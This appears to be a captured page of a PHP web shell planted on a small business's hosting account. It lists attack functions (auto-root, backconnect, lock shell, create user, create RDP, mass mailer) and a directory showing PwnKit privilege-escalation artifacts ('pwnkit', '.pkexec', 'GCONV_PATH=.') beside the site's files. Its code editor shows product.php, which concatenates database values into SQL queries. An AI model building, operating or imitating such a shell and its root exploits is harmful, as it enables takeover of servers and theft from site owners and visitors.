Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
assets
[ DIR ]
drwxr-xr-x
?;
authentic_siddhapura_machine
[ DIR ]
drwxr-xr-x
?;
database_19_11_2020
[ DIR ]
drwxr-xr-x
?;
einvite
[ DIR ]
drwxr-xr-x
.htaccess
1.88
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
583
B
-rw-r--r--
400.shtml
16.38
KB
-rw-r--r--
403.shtml
16.38
KB
-rw-r--r--
404.php
1.48
KB
-rw-r--r--
404.shtml
16.39
KB
-rw-r--r--
503.shtml
15.33
KB
-rw-r--r--
about.php
5.51
KB
-rw-r--r--
certification.php
987
B
-rw-r--r--
config.php
197
B
-rw-r--r--
contact.php
3.84
KB
-rw-r--r--
eventsandexhibition.php
1.14
KB
-rw-r--r--
exhibition.php
1.36
KB
-rw-r--r--
exhibition_category.php
1.19
KB
-rw-r--r--
footer.php
7.35
KB
-rw-r--r--
header.php
10.34
KB
-rw-r--r--
index.php
4.03
KB
-r--r--r--
mailcheck.php
0
B
-rw-r--r--
php.ini
577
B
-rw-r--r--
product.php
2.79
KB
-rw-r--r--
product_category.php
2.21
KB
-rw-r--r--
product_details.php
3.46
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slider.php
1.23
KB
-rw-r--r--
ss.php
15.03
KB
-rw-r--r--
working_site_backup_19_11_2020...
89.41
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : product.php
<!doctype html> <html class="no-js" lang="zxx"> <body> <?php include("header.php"); ?> <main> <!-- slider Area Start--> <!-- slider Area End--> <!-- Services Area Start --> <div class="services-area1 "> <div class="container"> <!-- section tittle --> <div class="row"> <div class="section-tittle"> <div class="front-text"> <h2 class="">Our Products</h2> </div> </div> </div> <?php $qur="SELECT * FROM `machinery_dept` order by `machinery_dept_sequence` asc"; $result=mysqli_query($c,$qur); if((mysqli_num_rows($result))>=1) { $deptnmmat =""; while($row=mysqli_fetch_array($result)) { ?> <h3 style="text-align: center; background:#191a33;color: #ffffff;" > <?php echo $row['machinery_dept_nm']; ?></h3> <div class="row"> <!-- cut from here--> <?php $qur2="SELECT * FROM `machinery` WHERE machinery_dept = '".$row['machinery_dept_nm']."' order by `machinery_sequence` asc"; $result2=mysqli_query($c,$qur2); if((mysqli_num_rows($result2))>=1) { while($row2=mysqli_fetch_array($result2)) { ?> <div class="col-xl-6 col-lg-4 col-md-6"> <div class="single-service-cap"> <div class="service-img"> <?php $model_no = $row2['machinery_model_no']; echo "<a href='product_details.php?id=$model_no'>"; ?> <img src="assets/img/products/particular/<?php echo strtoupper($row2['img_nm']);?>" alt=""> <?php echo "</a>"; ?> </div> <div class="service-cap"> <h5 > <?php $model_no = $row2['machinery_model_no']; echo "<a href='product_details.php?id=$model_no'>"; if($row2['machinery_name']<>$row2['machinery_model_no']) echo strtoupper($row2['machinery_name'])." - ".strtoupper($row2['machinery_model_no']); else echo strtoupper($row2['machinery_model_no']) ; ?> <?php echo "</a>"; ?> </h5> <?php $model_no = $row2['machinery_model_no']; echo "<a href='product_details.php?id=$model_no' class='more-btn'>"; ?> Read More <i class="ti-plus"></i><?php echo "</a>"; ?> </div> </div> </div> <?php }}?> <!-- cut from here--> </div> <?php } } ?> </div> </div> <!-- Services Area End --> </main> <?php include("footer.php"); ?> </body> </html>
Close